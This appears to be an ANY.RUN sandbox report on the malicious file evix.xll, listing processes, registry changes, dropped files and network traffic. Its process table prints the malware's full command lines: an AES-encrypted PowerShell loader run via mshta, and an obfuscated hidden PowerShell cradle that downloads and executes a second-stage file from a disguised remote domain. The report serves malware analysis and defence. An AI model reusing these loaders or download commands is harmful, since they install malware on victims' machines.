| File name: | evix.xll |
| Full analysis: | https://app.any.run/tasks/fb240d36-94fa-4fd5-aa4f-b6deb1ecadef |
| Verdict: | Malicious activity |
| Analysis date: | February 04, 2025, 23:16:10 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | data |
| MD5: | 963FE5F745EA94F8436ABFB9EA6CB042 |
| SHA1: | 8DE99B13DE965BF3EAE96A058ADBA5DC4E0FA1C3 |
| SHA256: | 650F97A3E3B4044E2B285E5E6F05FF29FC64A191E42D07302156318998DD4E83 |
| SSDEEP: | 12288:WqeU/rT2uuRo/ggF0vTZoDEH7LtbtU0HiN3UbvFmkARdU+Eo0Ql560dwSObga8fi:Vhu |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 6300 | "C:\Windows\System32\mshta.exe" C:\Users\admin\evix.xll | C:\Windows\System32\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6376 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function Uyxdlnm($bdlAvFU){-split($bdlAvFU -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$MPnBiqq=Uyxdlnm('13B937583BE04705C2B1399E3773302884FB951D71D47A8D66839077CFE50A3E182B52830CD5678362EED5BBAECB3B68B20D55E65B9CECD9288D0CAF210158B23FFC8D9102359494DFE4127A033B3570B51A2142B1E97766CD41B038400F168A171DD5056FE1F5FB83872B69532CAD304CE2B677C68653599A799571AE34BEC512C3B7BE4A2780790D97E10329D961257BF8D0CE5F45A1353773045A4741218BAD623E0479AABF50C4BC49E2260FE441F876F224D2E29F74462646ADBD0EBEAB5D5EF542D4366C002213593002E09654A0F52A8D0FC443EA764330EF78295D7E0CF27DA74DCA539C53DC08E67016EA7E489C18A2CBEDB6012EE27E666B8057156FF0506FE43644C0447035629F11134154EF2A02B6F9CDF42F4B2BC5BDFBAC517A0DC79B70AFE7346F254A8AECCE2B1F513810897BAEB40607CE2956663E297976C04BDD33016EA9F1AA7CC4A7B6C923D4731C22C68D25042283B327E754E430F13C8D1A964C358B105045900EFCE0926ECEF2D28A7E68ED7013DE990CC35524C7928FD18BF7DF8464348A05ADA6962AE6980133D013ECDF8CC09C47CE56D5625F91F3C40FF02609CC8F0A1B573BCFD257EC8B5C0852813141DB289D0699D55A24B94B8FCA558B0524193F2776F13536AB4B612149CF90FFB6D52BF1EFFCA4C1D2C97376C4DB7DB3D7AAC60A22F9C1AA6BAA854E4E10B07AF541A80825990900AF7E667021338A53F07079DBEAB50BC0A3186386B8FE27332848008ACA5872A50114913952314D81A7961D184C058BBB263CCB6075DCC7239AE3B3675A8725DD91FF5FF06572E251CFE008E6A4041CDA28E7C46F4E6C6139256DCEC4E6DCFD48BDF604D11514EC9AEE8820BC4977BDF427C95977786285BD8B7CC3821FB7231754C5B29375B5AE858E2C6C3237175225B3DC28732FD9AC7404CB33230CB4CD15A579317A4206AA0FE0C26600C00F335225EF80A719B70C2C45FEF95DCE7EC1A46F7D20F496850EE38EB7A3818D549127DBF6A51A074C2A95E933688FDD6601A72EC5F8CEDBEA88B763039FC8B56D4FC662AAC14225C60F3C3D8FB78197BF4C914E095FE2DA1EFCBC914413C8EF5BC8D5FD0602EE47105FC395E5F1A22FE9774E32FFCF469953D8D33F24A11517D2A019380F6E88F235562217256A55B36B09694240B0539E583E7AE5518DF3068F92100D03F36770D980B5C308CCAA0A9CE8D8CB7670F7B1D6CD098AC11987489479A47B1E4A9E43501C7D4E9C562D0375ACD1280AF8EECE3CA31653FD316E7A93953CA6DF9D50BC80A565055F131AEC3CF0FD0D20071903474FA4F608142DC6F9E233D15BBCBC8F354EF647861F0684A1C9EF64C71C138D3FA17C9C15DB4D964B49D3AF1605C0D67882ACB92B74DECEF51E66460066BE3F89893A8C016680734BC5E43ECCE7EFCD2C744477E2552774308B275C782F926791D202C70C5C53B2C6B0764FA3D1709872215111043A41876E92DEF46FCDCD7020F0E92F8298969A4B12D943086932904997F863A540DF44DB1F16A81CDC8562C767462C76BB84967C2A46F49E9FAEFCD8987C99388DD51DC6C83DA210A0F436CA045B4B6E5ABBF97A7D4D6BF8E87633299C80634CD6C299C892FB22B5EB52742E88A65BD75611FC32CE951A8B68CAE03CB1A6CE8DD99BF3E48BBDA58ECDD398A66B8A4BCB970FD4ADB5CA51EB11382D43E704801FA7C76FC9B8432504F2124AAFA402A4DAB085545AB9A0C67F618B043365D065217D31A1E0A3B64E891365278880D5E19273973A1370E4C470FE920D39638778B4329FE9E011AE32C3FA0F457EFB40D514B12A6EDC2A2FC9758766DEC4E49547A6AA19CEF4D0C86F09F8D6DCF48C4A92DF9F3FD76117351079D50D208ADD59DFEC064B01A432EE005B9E7A89EEA5268F33A20917FCF93E7FA7E1C944428AEB9740A121A2B04DCBF5541B2808D70CCC6C3F3AB3266443800D3897423B7C18114444AA92527730D2E4413BCC45F125F68A06DBB5CFC2DBFF6D7C97E352BC13874A6593CD8B6381628E9248D9FCA0D41FC4F4618E987524386CCF8AD37B67430D4798749094F55F62122F1558147909BB3B7D142E1C5A803E019F292639A10038D371CCAB21891B2A4AE67A2148127B87D03284F69585EEC390E41B8A2DA4C18EA3FD119A10B0B49800C6483FAE0C50BD7E9DDA0EC3F97081373FCF816922D5860F2B33E080F9F9F0374BBF42920B5CB1CC3C18B5BAD92EDA77F2DDD5C9AB26125E0F720B217EBACB3B1151BA8CC2F8E33FD353462408DAA5980974F80A9F9BD83C79D1E1452144723DD114EA4424734E1A4FD384FC413C2682A10A3CCB9F01A5940C441B1F80DC8B97ABBD5F69F4478ACEC3E4BC2929C015FFCB52061C10E2E5E012192A4F9020506912AC5E02A683DAF5C53F7CD68B2D3E849ECFB885BC212D0E90E4A36CCB643B8ECC8C6368D26E37B86465C1B1B9CF2711221F01DAD293EA95A400B46E673CB5C9E111F06E0057F02FB2D9B99515246A8B54595B971E59164043980AA991509E13E0255595255730BE2FC088009EE625E82497589EDB7971404647FC37C3061D7174B32148D79E9ABB4345C18F805556131C593F7A0CF2011C32371F81445CA2BC7E5DE8A57F211393A63264A64B5DEA063CFE07CE85067C522E62F4E9E05CD2C33AD2D2BED419D9172D335DAA2A5EFDF46C0DF9B27CC97F32B45E3ACD7FBD84E8E0675C614DC7F2CDA243220F2C30EC6848B16AF1EB5D0DCECCBA9F7C05A9E8');$DeycV=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((Uyxdlnm('41576D6C7957426F7567584D7A714368')),[byte[]]::new(16)).TransformFinalBlock($MPnBiqq,0,$MPnBiqq.Length)); & $DeycV.Substring(0,3) $DeycV.Substring(3) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6384 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7000 | "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command ls 'pena*';SV F9 (&(GV E*ext -Value).(((GV E*ext -Value)|Member)[6].Name).(((GV E*ext -Value).(((GV E*ext -Value)|Member)[6].Name)|Member|Where-Object{$_.Name -like '*t*om*d'}).Name).Invoke((GV E*ext -Value).(((GV E*ext -Value)|Member)[6].Name).GetCommandName('*w-*ct',1,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);SI Variable:/os 'https://googleapis-n-cdn3s-server.willingcapablepatronage.shop/b313d4a4588bd2e7bc9ece877caba58a.xll';.( (LS Variable:\P*ome).Value[21]+$PsHome[30]+'x')((Get-Variable F9).Value.((((Get-Variable F9).Value|Member)|Where-Object{$_.Name -like '*wn*d*g'}).Name).Invoke((GV os).Value)) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7008 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6300) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (6300) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (6300) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (7000) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (7000) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (7000) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (7000) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (7000) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (7000) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (7000) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6376 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gjkchlrr.pd1.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7000 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_olsbqmtr.dfq.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7000 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p2ebqwza.ejo.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7000 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 6376 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_i5fvsv2p.4yz.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6376 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:D1CD54D707314B33D9EF2218541BA926 | SHA256:AA17E9C71F5665AB420B9E048CC166BF483AEA8EF4BC191725D9443B468DEF46 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
4704 | backgroundTaskHost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
2100 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
2100 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
6060 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5064 | SearchApp.exe | 104.126.37.186:443 | — | Akamai International B.V. | DE | unknown |
5064 | SearchApp.exe | 104.126.37.137:443 | — | Akamai International B.V. | DE | unknown |
5064 | SearchApp.exe | 2.23.77.188:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
1176 | svchost.exe | 40.126.32.138:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
googleapis-n-cdn3s-server.willingcapablepatronage.shop |
| unknown |
go.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |